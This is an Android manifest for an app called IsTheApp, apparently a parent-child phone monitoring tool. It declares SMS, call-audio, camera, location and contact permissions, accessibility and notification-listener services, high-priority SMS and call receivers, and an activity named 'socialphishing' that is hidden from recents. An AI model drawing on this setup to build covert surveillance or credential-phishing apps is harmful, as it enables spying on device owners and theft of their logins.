<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.github.midros.istheapp">
    <!-- location -->
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <!-- storage -->
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <!-- calls -->
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.CAPTURE_AUDIO_OUTPUT"
        tools:ignore="ProtectedPermissions" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <!-- message -->
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.WRITE_SMS" />
    <!-- camera -->
    <uses-permission android:name="android.permission.CAMERA" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />

    <uses-feature
        android:name="android.hardware.camera"
        android:required="true" />

    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <uses-permission
        android:name="android.permission.PACKAGE_USAGE_STATS"
        tools:ignore="ProtectedPermissions" />

    <!-- vibrate -->
    <uses-permission android:name="android.permission.VIBRATE" />

    <application
        android:name=".app.IsTheApp"
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher"
        android:supportsRtl="true"
        android:theme="@style/AppTheme"
        tools:ignore="AllowBackup,GoogleAppIndexingWarning"
        android:sharedUserId="android.uid.system"
        tools:replace="android:icon">
        <activity
            android:name=".ui.activities.login.LoginActivity"
            android:theme="@style/Login">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity
            android:name=".ui.activities.register.RegisterActivity"
            android:theme="@style/Login" />
        <activity
            android:name=".ui.activities.mainparent.MainParentActivity"
            android:theme="@style/AppTheme"
            android:configChanges="orientation|screenSize" />
        <activity
            android:name=".ui.activities.mainchild.MainChildActivity"
            android:theme="@style/Child"
            android:configChanges="orientation|screenSize" />
        <activity
            android:name=".ui.activities.lock.LockActivity"
            android:theme="@style/Lock" />
        <activity
            android:name=".ui.activities.gallery.ViewPhoto"
            android:configChanges="orientation|screenSize"
            android:theme="@style/Transparent" />
        <activity
            android:name=".ui.activities.socialphishing.SocialActivityM"
            android:configChanges="orientation|screenSize"
            android:excludeFromRecents="true"
            android:taskAffinity="com.github.midros.istheapp.ui.activities.socialphishing.SocialActivityM"
            android:theme="@style/Social" />

        <!-- Services -->
        <service android:name=".services.calls.CallsService" />
        <service android:name=".services.sms.SmsService" />
        <service android:name=".services.social.MonitorService" />
        <service
            android:name=".services.accessibilityData.AccessibilityDataService"
            android:label="@string/accessibility_service_label"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
            tools:ignore="InnerclassSeparator">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>

            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_service_config" />
        </service>
        <service
            android:name=".services.notificationService.NotificationService"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>

        <!-- Receivers -->
        <receiver
            android:name=".receiver.SmsReceiver"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <receiver android:name=".receiver.CallsReceiver">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.NEW_OUTGOING_CALL" />
                <action android:name="android.intent.action.PHONE_STATE" />
            </intent-filter>
        </receiver>
        <receiver
            android:name=".receiver.MonitorReceiver"
            android:enabled="true"
            android:exported="false">
            <intent-filter>
                <action android:name="com.github.midros.istheapp.receiver.RESTART_MONITOR_RECEIVER" />
            </intent-filter>
        </receiver>

        <meta-data
            android:name="com.google.android.gms.version"
            android:value="@integer/google_play_services_version" />
        <meta-data
            android:name="com.google.android.maps.v2.API_KEY"
            android:value="@string/APY_KEY_MAPS" />

    </application>

</manifest>